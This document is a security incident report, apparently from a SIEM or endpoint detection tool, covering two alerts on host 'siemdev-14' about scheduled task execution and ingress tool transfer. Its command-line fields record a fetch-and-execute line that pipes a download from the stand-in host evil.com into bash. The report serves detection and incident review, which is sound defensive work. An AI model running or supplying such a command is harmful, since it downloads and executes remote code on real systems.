Incident Overview

Incident ID CINC-20251220-EC0104B2
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-14 02:01:05
Last Seen 2025-12-14 02:01:05
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Execution, Command and Control
Techniques: Scheduled Task/Job, Ingress Tool Transfer

Affected Hosts (1)

siemdev-14

Related Alerts (2)

Alert 1
Severity High
Status new
Hostname siemdev-14
Description A scheduled task/job has been executed on your host. This could be used by an attacker to execute programs at system startup, or on a scheduled basis for persistence. Please check the process tree to determine if executed commands are malicious or if this was expected behavior.
Tactic Execution
Command Line curl http://evil.com/shell
Time 12-14 02:01

Alert 2
Severity High
Status new
Hostname siemdev-14
Description An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
Tactic Command and Control
Command Line /bin/sh -c curl http://evil.com/shell|bash
Time 12-14 02:01